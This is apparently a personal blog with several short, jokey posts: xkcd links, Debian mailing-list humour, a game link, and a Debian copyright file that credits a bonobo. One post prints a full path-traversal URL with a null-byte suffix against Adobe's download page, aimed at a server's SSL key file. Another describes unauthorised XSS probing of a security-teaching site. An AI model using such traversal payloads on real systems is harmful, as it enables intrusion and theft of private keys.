nion's blog

This is definitely one of the funniest youtube videos I ever saw

Love this one:



[via xkcd of course]

... and of course some other interesting data.

http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../..//usr/local/apache/conf/ssl.key/www.adobe.com.key%00

That's really bad

UPDATE: the certificate seems to be self signed, it is not the certificate from https://www.adobe.com, thanks rbu
Anyway there is other useful information and it's still a bug.

UPDATE: looks like they are currently fixing the issue:
"Site Area Temporarily Unavailable

The Player Download Center is temporarily unavailable. In the meantime, you may download Adobe Flash Player and Adobe Shockwave Player from the links below."

"Scheint ein Windows-Rechner zu sein, denn ein ssh mit root geht nicht." or in english "It must be a Windows computer since ssh with root is not working" ;-P
Seen today on a Debian user mailing list.

I am really curious how people come to these conclusions

The tele-lab made by the Hasso-Plattner-Institut was recently in the news because they announced their new online portal for teaching different aspects of security at the Cebit (Golem and many others reported about this).

Since I couldn't really imagine how they can teach realistic security scenarios completely via a website I thought I ask for a test account which I got today.
You can access a web front-end where you have tutorials for stuff like sniffing, MiTM, encryption, portscanning, WLAN and so on with some practical lessons.

Don't ask why but the first thing I usually do on a website where I can see POST parameters in the URL is to test for XSS. I am not really an expert in web security but I have spare time

Surprisingly one of the first parameters I tried is actually vulnerable as you can see in the following screenshot (sorry if you have no account you can not try):

.
I have to say that I am not an expert in web security but this also looks like a possible SQL injection.

Sorry tele-lab-guys but this is lame, if you teach security, at-least secure your website from basic attacks.

Those who come from Germany might know that the DHL is not very famous for doing a great job.
While going to university today I found out why

Sec wrote about a nice game with the name find it.

The game is easy, you see an image and some part of the image changes gradually. You have to click on that part to get to the next level, if you don't find it in time you lose but can try again.

Lets waste some time: http://newyorkdezyne.com/findit2.html!

Then the result is `telnet gw.boston.ru` ;-P

[via Doomy]

Today I stumbled over the copyright file for Debian for revoco because of an RFS (request for sponsor).

To quote from http://mentors.debian.net/debian/pool/main/r/revoco/revoco_0.3-1.diff.gz

License:
In revoco.c is written, a bonobo has written the code,
so no copyright applies.

I got the following mail from the owner of the bonobo, after asking
about the licence of the code (the mail is in German, English tranlation
follows):

[...]
English translation:

> In revoco.c it's written:
> Written November 2006 by E. Toernig's bonobo - no copyrights.
> For German law that is wrong, you have written it,

Why do you think so? It was written by my bonobo!

> so it is your copyright.

No. If any, so of the bonobo. But because the creations of animals
are not "protected" by the copyright-laws,
it is public domain (or maybe "bonoboware?).

[...]

> Would it be possible, to put revoco under the BSD (oder GPL, LGPL) licence,
> so all the Linux-users can use it?

My bonobo does not know anything about liences. If you want to
enter something for Debian, "public domain" would be the best.

Thanks E.Toernig, this made my morning